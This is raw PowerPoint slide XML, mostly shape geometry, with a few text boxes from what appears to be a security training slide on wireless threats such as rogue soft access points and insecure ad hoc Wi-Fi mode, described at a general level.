                      <a:gd name="T6" fmla="*/ 1280 w 1280"/>
                      <a:gd name="T7" fmla="*/ 342 h 607"/>
                      <a:gd name="T8" fmla="*/ 0 w 1280"/>
                      <a:gd name="T9" fmla="*/ 0 h 607"/>
                      <a:gd name="T10" fmla="*/ 1250 w 1280"/>
                      <a:gd name="T11" fmla="*/ 564 h 607"/>
                      <a:gd name="T12" fmla="*/ 33 w 1280"/>
                      <a:gd name="T13" fmla="*/ 241 h 607"/>
                      <a:gd name="T14" fmla="*/ 33 w 1280"/>
                      <a:gd name="T15" fmla="*/ 40 h 607"/>
                      <a:gd name="T16" fmla="*/ 1247 w 1280"/>
                      <a:gd name="T17" fmla="*/ 366 h 607"/>
                      <a:gd name="T18" fmla="*/ 1250 w 1280"/>
                      <a:gd name="T19" fmla="*/ 366 h 607"/>
                      <a:gd name="T20" fmla="*/ 1250 w 1280"/>
                      <a:gd name="T21" fmla="*/ 564 h 6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80" h="607">
                        <a:moveTo>
                          <a:pt x="0" y="0"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="0" y="264"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="1280" y="607"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="1280" y="342"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="0"/>
                        </a:lnTo>
                        <a:close/>
                        <a:moveTo>
                          <a:pt x="1250" y="564"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="33" y="241"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="33" y="40"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="1247" y="366"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="1250" y="366"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="1250" y="564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59" name="Freeform 540"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="3882" y="2236"/>
                  <a:ext cx="215" cy="954"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 255"/>
                    <a:gd name="T1" fmla="*/ 68 h 1129"/>
                    <a:gd name="T2" fmla="*/ 0 w 255"/>
                    <a:gd name="T3" fmla="*/ 333 h 1129"/>
                    <a:gd name="T4" fmla="*/ 0 w 255"/>
                    <a:gd name="T5" fmla="*/ 373 h 1129"/>
                    <a:gd name="T6" fmla="*/ 0 w 255"/>
                    <a:gd name="T7" fmla="*/ 564 h 1129"/>
                    <a:gd name="T8" fmla="*/ 0 w 255"/>
                    <a:gd name="T9" fmla="*/ 597 h 1129"/>
                    <a:gd name="T10" fmla="*/ 0 w 255"/>
                    <a:gd name="T11" fmla="*/ 864 h 1129"/>
                    <a:gd name="T12" fmla="*/ 0 w 255"/>
                    <a:gd name="T13" fmla="*/ 897 h 1129"/>
                    <a:gd name="T14" fmla="*/ 0 w 255"/>
                    <a:gd name="T15" fmla="*/ 1129 h 1129"/>
                    <a:gd name="T16" fmla="*/ 255 w 255"/>
                    <a:gd name="T17" fmla="*/ 1060 h 1129"/>
                    <a:gd name="T18" fmla="*/ 255 w 255"/>
                    <a:gd name="T19" fmla="*/ 829 h 1129"/>
                    <a:gd name="T20" fmla="*/ 255 w 255"/>
                    <a:gd name="T21" fmla="*/ 796 h 1129"/>
                    <a:gd name="T22" fmla="*/ 255 w 255"/>
                    <a:gd name="T23" fmla="*/ 529 h 1129"/>
                    <a:gd name="T24" fmla="*/ 255 w 255"/>
                    <a:gd name="T25" fmla="*/ 496 h 1129"/>
                    <a:gd name="T26" fmla="*/ 255 w 255"/>
                    <a:gd name="T27" fmla="*/ 304 h 1129"/>
                    <a:gd name="T28" fmla="*/ 255 w 255"/>
                    <a:gd name="T29" fmla="*/ 264 h 1129"/>
                    <a:gd name="T30" fmla="*/ 255 w 255"/>
                    <a:gd name="T31" fmla="*/ 0 h 1129"/>
                    <a:gd name="T32" fmla="*/ 0 w 255"/>
                    <a:gd name="T33" fmla="*/ 68 h 1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55" h="1129">
                      <a:moveTo>
                        <a:pt x="0" y="68"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="333"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="373"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="564"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="597"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="864"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="897"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="1129"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="255" y="1060"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="255" y="829"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="255" y="796"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="255" y="529"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="255" y="496"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="255" y="304"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="255" y="264"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="255" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="68"/>
                      </a:lnTo>
                      <a:close/>
                    </a:path>
                  </a:pathLst>
                </a:custGeom>
                <a:solidFill>
                  <a:srgbClr val="828282"/>
                </a:solidFill>
                <a:ln w="9525">
                  <a:solidFill>
                    <a:srgbClr val="545554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60" name="Freeform 541"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="2804" y="1945"/>
                  <a:ext cx="1293" cy="347"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 1535 w 1535"/>
                    <a:gd name="T1" fmla="*/ 340 h 408"/>
                    <a:gd name="T2" fmla="*/ 255 w 1535"/>
                    <a:gd name="T3" fmla="*/ 0 h 408"/>
                    <a:gd name="T4" fmla="*/ 0 w 1535"/>
                    <a:gd name="T5" fmla="*/ 68 h 408"/>
                    <a:gd name="T6" fmla="*/ 1280 w 1535"/>
                    <a:gd name="T7" fmla="*/ 408 h 408"/>
                    <a:gd name="T8" fmla="*/ 1535 w 1535"/>
                    <a:gd name="T9" fmla="*/ 340 h 4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5" h="408">
                      <a:moveTo>
                        <a:pt x="1535" y="340"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="255" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="68"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1280" y="408"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1535" y="340"/>
                      </a:lnTo>
                      <a:close/>
                    </a:path>
                  </a:pathLst>
                </a:custGeom>
                <a:solidFill>
                  <a:srgbClr val="6D6D6C"/>
                </a:solidFill>
                <a:ln w="9525" cap="flat" cmpd="sng">
                  <a:solidFill>
                    <a:srgbClr val="545554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193" name="Oval 1192"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6266347" y="2458127"/>
              <a:ext cx="182880" cy="18288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204" name="Group 1203">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{48232261-63AC-47FB-8215-1C1A01DFCBD0}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm flipH="1">
              <a:off x="9607105" y="4635473"/>
              <a:ext cx="1408039" cy="1132391"/>
              <a:chOff x="-692388" y="3215504"/>
              <a:chExt cx="1408039" cy="1132391"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="1206" name="Picture 1205">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A0104B94-B6DF-45D3-B7ED-34DEFE29D6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692388" y="3215504"/>
                <a:ext cx="1408039" cy="1132391"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="1207" name="Picture 1206" descr="A picture containing bridge&#10;&#10;Description automatically generated">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{33854ADC-F4B7-4314-AC14-D9FC25BD0F0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21021"/>
              <a:stretch/>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="157615" y="3343881"/>
                <a:ext cx="434685" cy="357663"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </p:grpSp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="1208" name="Picture 1207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C0870554-E28F-44B3-8B6E-59761F90EBF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6997664" y="1981061"/>
              <a:ext cx="284712" cy="234264"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="1209" name="Picture 1208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CB5CF73A-5A78-49CA-87C0-0D94EEEB99F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8051535" y="2852240"/>
              <a:ext cx="284712" cy="234264"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="1210" name="Picture 1209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15EBF29F-F234-42B3-8274-CE20E8A0B8A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9328860" y="2724324"/>
              <a:ext cx="284712" cy="234264"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="1211" name="Picture 1210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91A6C280-043A-4D77-A517-BBD48877925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4505168" y="1471242"/>
              <a:ext cx="284712" cy="234264"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1212" name="Rounded Rectangle 243">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4BBA0638-CEDE-4CD7-8771-298CD8DE6337}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="164592" y="4648200"/>
            <a:ext cx="2532933" cy="54863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4217"/>
            <a:endParaRPr lang="bg-BG" dirty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1213" name="Rounded Rectangle 245">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B3362DA2-D4D1-4DEC-BAC6-C562BC4AAC7B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2845331" y="4648200"/>
            <a:ext cx="2532888" cy="54863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4217"/>
            <a:endParaRPr lang="bg-BG" dirty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1214" name="Rounded Rectangle 247">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{90CE9E82-504F-49EF-B2B0-2C70C4D66066}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5526024" y="4648200"/>
            <a:ext cx="2532888" cy="5486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4217"/>
            <a:endParaRPr lang="bg-BG" dirty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1215" name="TextBox 1214">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ECECC1F5-0881-4882-B556-AEBBE28C7AF1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1050006" y="4163200"/>
            <a:ext cx="762105" cy="553998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40000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft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chemeClr val="accent1">
                    <a:lumMod val="7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01</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1216" name="TextBox 1215">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8359A70C-8C23-4BDA-902B-16D9318FDBC1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3773611" y="4163200"/>
            <a:ext cx="676329" cy="553998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40000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft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02</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1217" name="TextBox 1216">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{537DEC78-D4CE-4186-81EF-09EC1A19B831}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6429910" y="4163200"/>
            <a:ext cx="725117" cy="553998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40000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft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03</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1218" name="Rectangle 1217">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AC6EDAB9-0960-49C3-9C72-0561F43DF454}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="149352" y="4781996"/>
            <a:ext cx="2531905" cy="1661993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Soft APs are client cards or embedded WLAN radios in some PDAs and laptops that can be launched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inadvertently or through a virus program</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1219" name="Rectangle 1218">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4210FDAF-FC32-47FB-9CD6-9E196B788B13}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2845331" y="4781996"/>
            <a:ext cx="2531859" cy="1400383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Attackers infect a victim's machine and activate soft APs, thus allowing them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unauthorized connection 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to the enterprise network </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1220" name="Rectangle 1219">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{201027D0-E6E2-4B5F-955F-7BF480A02C76}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5541264" y="4781996"/>
            <a:ext cx="2532888" cy="1138773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Attackers connect to enterprise networks through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soft APs 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instead of the actual APs</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="225830229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L-Shape 58"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000">
            <a:off x="778147" y="2362190"/>
            <a:ext cx="1390952" cy="2310994"/>
          </a:xfrm>
          <a:prstGeom prst="corner">
            <a:avLst>
              <a:gd name="adj1" fmla="val 16120"/>
              <a:gd name="adj2" fmla="val 1611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2">
              <a:hueOff val="0"/>
              <a:satOff val="0"/>
              <a:lumOff val="0"/>
              <a:alphaOff val="0"/>
            </a:schemeClr>
          </a:lnRef>
          <a:fillRef idx="1">
            <a:schemeClr val="accent2">
              <a:hueOff val="0"/>
              <a:satOff val="0"/>
              <a:lumOff val="0"/>
              <a:alphaOff val="0"/>
            </a:schemeClr>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:schemeClr val="accent2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61" name="L-Shape 60"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000">
            <a:off x="3102027" y="3322355"/>
            <a:ext cx="1390951" cy="2310994"/>
          </a:xfrm>
          <a:prstGeom prst="corner">
            <a:avLst>
              <a:gd name="adj1" fmla="val 16120"/>
              <a:gd name="adj2" fmla="val 1611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4">
              <a:hueOff val="0"/>
              <a:satOff val="0"/>
              <a:lumOff val="0"/>
              <a:alphaOff val="0"/>
            </a:schemeClr>
          </a:lnRef>
          <a:fillRef idx="1">
            <a:schemeClr val="accent4">
              <a:hueOff val="0"/>
              <a:satOff val="0"/>
              <a:lumOff val="0"/>
              <a:alphaOff val="0"/>
            </a:schemeClr>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:schemeClr val="accent4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66" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="557948" y="3543300"/>
            <a:ext cx="2061774" cy="1290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21893" tIns="60946" rIns="121893" bIns="60946"/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Wi-Fi clients communicate directly via an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ad hoc mode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that does not require an AP to relay packets</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="68" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2885697" y="4509840"/>
            <a:ext cx="2092853" cy="12415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21893" tIns="60946" rIns="121893" bIns="60946"/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 ad hoc mode is inherently insecure and does not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provide strong authentication and encryption</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="69" name="L-Shape 68"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000">
            <a:off x="5413021" y="4321529"/>
            <a:ext cx="1390951" cy="2310994"/>
          </a:xfrm>
          <a:prstGeom prst="corner">
            <a:avLst>
              <a:gd name="adj1" fmla="val 16120"/>
              <a:gd name="adj2" fmla="val 1611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4">
              <a:hueOff val="0"/>
              <a:satOff val="0"/>
              <a:lumOff val="0"/>
              <a:alphaOff val="0"/>
            </a:schemeClr>
          </a:lnRef>
          <a:fillRef idx="1">
            <a:schemeClr val="accent4">
              <a:hueOff val="0"/>
              <a:satOff val="0"/>
              <a:lumOff val="0"/>
              <a:alphaOff val="0"/>
            </a:schemeClr>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:schemeClr val="accent4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70" name="Freeform 16"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5945023" y="5076186"/>
            <a:ext cx="271253" cy="426105"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 406 w 657"/>
              <a:gd name="T1" fmla="*/ 947 h 1032"/>
              <a:gd name="T2" fmla="*/ 333 w 657"/>
              <a:gd name="T3" fmla="*/ 1031 h 1032"/>
              <a:gd name="T4" fmla="*/ 250 w 657"/>
              <a:gd name="T5" fmla="*/ 947 h 1032"/>
              <a:gd name="T6" fmla="*/ 448 w 657"/>
              <a:gd name="T7" fmla="*/ 916 h 1032"/>
              <a:gd name="T8" fmla="*/ 198 w 657"/>
              <a:gd name="T9" fmla="*/ 833 h 1032"/>
              <a:gd name="T10" fmla="*/ 656 w 657"/>
              <a:gd name="T11" fmla="*/ 333 h 1032"/>
              <a:gd name="T12" fmla="*/ 562 w 657"/>
              <a:gd name="T13" fmla="*/ 562 h 1032"/>
              <a:gd name="T14" fmla="*/ 531 w 657"/>
              <a:gd name="T15" fmla="*/ 635 h 1032"/>
              <a:gd name="T16" fmla="*/ 500 w 657"/>
              <a:gd name="T17" fmla="*/ 708 h 1032"/>
              <a:gd name="T18" fmla="*/ 500 w 657"/>
              <a:gd name="T19" fmla="*/ 729 h 1032"/>
              <a:gd name="T20" fmla="*/ 166 w 657"/>
              <a:gd name="T21" fmla="*/ 791 h 1032"/>
              <a:gd name="T22" fmla="*/ 156 w 657"/>
              <a:gd name="T23" fmla="*/ 708 h 1032"/>
              <a:gd name="T24" fmla="*/ 135 w 657"/>
              <a:gd name="T25" fmla="*/ 635 h 1032"/>
              <a:gd name="T26" fmla="*/ 93 w 657"/>
              <a:gd name="T27" fmla="*/ 552 h 1032"/>
              <a:gd name="T28" fmla="*/ 0 w 657"/>
              <a:gd name="T29" fmla="*/ 333 h 1032"/>
              <a:gd name="T30" fmla="*/ 333 w 657"/>
              <a:gd name="T31" fmla="*/ 0 h 1032"/>
              <a:gd name="T32" fmla="*/ 656 w 657"/>
              <a:gd name="T33" fmla="*/ 333 h 1032"/>
              <a:gd name="T34" fmla="*/ 510 w 657"/>
              <a:gd name="T35" fmla="*/ 156 h 1032"/>
              <a:gd name="T36" fmla="*/ 156 w 657"/>
              <a:gd name="T37" fmla="*/ 156 h 1032"/>
              <a:gd name="T38" fmla="*/ 146 w 657"/>
              <a:gd name="T39" fmla="*/ 499 h 1032"/>
              <a:gd name="T40" fmla="*/ 166 w 657"/>
              <a:gd name="T41" fmla="*/ 541 h 1032"/>
              <a:gd name="T42" fmla="*/ 229 w 657"/>
              <a:gd name="T43" fmla="*/ 666 h 1032"/>
              <a:gd name="T44" fmla="*/ 427 w 657"/>
              <a:gd name="T45" fmla="*/ 718 h 1032"/>
              <a:gd name="T46" fmla="*/ 458 w 657"/>
              <a:gd name="T47" fmla="*/ 604 h 1032"/>
              <a:gd name="T48" fmla="*/ 510 w 657"/>
              <a:gd name="T49" fmla="*/ 520 h 1032"/>
              <a:gd name="T50" fmla="*/ 583 w 657"/>
              <a:gd name="T51" fmla="*/ 333 h 1032"/>
              <a:gd name="T52" fmla="*/ 354 w 657"/>
              <a:gd name="T53" fmla="*/ 354 h 1032"/>
              <a:gd name="T54" fmla="*/ 302 w 657"/>
              <a:gd name="T55" fmla="*/ 354 h 1032"/>
              <a:gd name="T56" fmla="*/ 239 w 657"/>
              <a:gd name="T57" fmla="*/ 354 h 1032"/>
              <a:gd name="T58" fmla="*/ 250 w 657"/>
              <a:gd name="T59" fmla="*/ 499 h 1032"/>
              <a:gd name="T60" fmla="*/ 302 w 657"/>
              <a:gd name="T61" fmla="*/ 499 h 1032"/>
              <a:gd name="T62" fmla="*/ 364 w 657"/>
              <a:gd name="T63" fmla="*/ 499 h 1032"/>
              <a:gd name="T64" fmla="*/ 416 w 657"/>
              <a:gd name="T65" fmla="*/ 499 h 1032"/>
              <a:gd name="T66" fmla="*/ 427 w 657"/>
              <a:gd name="T67" fmla="*/ 354 h 1032"/>
              <a:gd name="T68" fmla="*/ 385 w 657"/>
              <a:gd name="T69" fmla="*/ 416 h 10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57" h="1032">
                <a:moveTo>
                  <a:pt x="250" y="947"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="406" y="947"/>
                  <a:pt x="406" y="947"/>
                  <a:pt x="406" y="947"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="406" y="968"/>
                  <a:pt x="396" y="989"/>
                  <a:pt x="385" y="1010"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="364" y="1020"/>
                  <a:pt x="354" y="1031"/>
                  <a:pt x="333" y="1031"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="312" y="1031"/>
                  <a:pt x="291" y="1020"/>
                  <a:pt x="281" y="1010"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="260" y="989"/>
                  <a:pt x="250" y="968"/>
                  <a:pt x="250" y="947"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="208" y="916"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="448" y="916"/>
                  <a:pt x="448" y="916"/>
                  <a:pt x="448" y="916"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="458" y="833"/>
                  <a:pt x="458" y="833"/>
                  <a:pt x="458" y="833"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="198" y="833"/>
                  <a:pt x="198" y="833"/>
                  <a:pt x="198" y="833"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="208" y="916"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="656" y="333"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="656" y="416"/>
                  <a:pt x="625" y="489"/>
                  <a:pt x="573" y="552"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="562" y="562"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="562" y="562"/>
                  <a:pt x="562" y="572"/>
                  <a:pt x="552" y="572"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="541" y="593"/>
                  <a:pt x="541" y="614"/>
                  <a:pt x="531" y="635"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="521" y="656"/>
                  <a:pt x="510" y="677"/>
                  <a:pt x="510" y="697"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="500" y="697"/>
                  <a:pt x="500" y="697"/>
                  <a:pt x="500" y="708"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="500" y="718"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="500" y="729"/>
                  <a:pt x="500" y="729"/>
                  <a:pt x="500" y="729"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="500" y="791"/>
                  <a:pt x="500" y="791"/>
                  <a:pt x="500" y="791"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="166" y="791"/>
                  <a:pt x="166" y="791"/>
                  <a:pt x="166" y="791"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="166" y="729"/>
                  <a:pt x="166" y="729"/>
                  <a:pt x="166" y="729"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="166" y="718"/>
                  <a:pt x="156" y="718"/>
                  <a:pt x="156" y="708"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="156" y="697"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="146" y="677"/>
                  <a:pt x="146" y="656"/>
                  <a:pt x="135" y="635"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="125" y="614"/>
                  <a:pt x="114" y="593"/>
                  <a:pt x="104" y="572"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="93" y="562"/>
                  <a:pt x="93" y="562"/>
                  <a:pt x="93" y="552"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="83" y="552"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="31" y="489"/>
                  <a:pt x="0" y="416"/>
                  <a:pt x="0" y="333"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="239"/>
